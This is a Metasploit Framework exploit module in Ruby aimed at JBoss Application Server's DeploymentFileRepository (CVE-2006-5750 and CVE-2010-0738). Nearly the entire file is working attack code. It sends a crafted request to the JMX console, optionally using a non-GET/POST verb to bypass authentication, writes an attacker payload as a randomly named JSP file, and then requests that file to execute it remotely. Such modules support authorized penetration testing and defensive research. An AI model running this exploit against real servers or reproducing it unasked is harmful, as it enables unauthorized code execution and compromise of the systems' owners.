metasploit-framework/modules/exploits/multi/http/jboss_deploymentfilerepository.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'JBoss Java Class DeploymentFileRepository Directory Traversal',
			'Description' => %q{
					This module exploits a directory traversal vulnerability in the DeploymentFileRepository
				class in JBoss Application Server (jbossas) 3.2.4 through 4.0.5. This vulnerability
				allows remote authenticated (and unathenticated) users to read or modify arbitrary files,
				and possibly execute arbitrary code.
			},
			'Author'      => [ 'MC', 'Jacob Giannantonio' ],
			'License'     => MSF_LICENSE,
			'Version'     => '$Revision$',
			'References'  =>
				[
					[ 'CVE', '2006-5750' ],
					[ 'CVE', '2010-0738' ], # by using VERB other than GET/POST
					[ 'OSVDB', '30767'],
					[ 'BID', '21219' ]
				],
			'Privileged'  => false,
			'Platform'    => ['linux', 'windows' ],
			'Targets'     =>
				[
					[ 'Universal',
						{
							'Arch' => ARCH_JAVA,
							'Payload' =>
								{
									'DisableNops' => true,
								},
						}
					],
				],
			'DisclosureDate' => 'Nov 27 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(8080),
				OptString.new('SHELL', [ true,  "The system shell to use.",     '/bin/sh']),
				OptString.new('URI',   [ true,  "The URI to call the payload.", '/web-console/']),
				OptString.new('PATH',  [ true,  "The URI to deploy the payload.", 'console-mgr.sar/web-console.war/']),
				OptString.new('VERB',  [ true,  "The HTTP verb to use", "POST"]),
			], self.class)
	end

	def exploit

		fname = rand_text_alpha_upper(rand(5) + 1)

		data =  'action=invokeOp'
		data << '&name=jboss.admin%3Aservice%3DDeploymentFileRepository'
		data << '&methodIndex=5'
		data << '&arg0=' + Rex::Text.uri_encode(datastore['PATH'])
		data << '&arg1=' + fname
		data << '&arg2=.jsp'
		data << '&arg3=' + Rex::Text.uri_encode(payload.encoded)
		data << '&arg4=True'

		if (datastore['VERB'] == "POST")
			res = send_request_cgi(
				{
					'uri'    => '/jmx-console/HtmlAdaptor',
					'method' => datastore['VERB'],
					'data'   => data
				})
		else
			res = send_request_cgi(
				{
					'uri'    =>  '/jmx-console/HtmlAdaptor;index.jsp?' + data,
					'method' => datastore['VERB'],
				})
		end

		if (res.code == 200)
			print_status("Triggering payload at '#{datastore['URI']}#{fname}.jsp'...")
			verb = 'GET'
			if (datastore['VERB'] != 'GET' and datastore['VERB'] != 'POST')
				verb = 'HEAD'
			end
			send_request_raw(
				{
					'uri'    => datastore['URI'] + fname + '.jsp',
					'method' => verb,
			 	})
		else
			print_error("Denied...")
		end

		handler
	end

end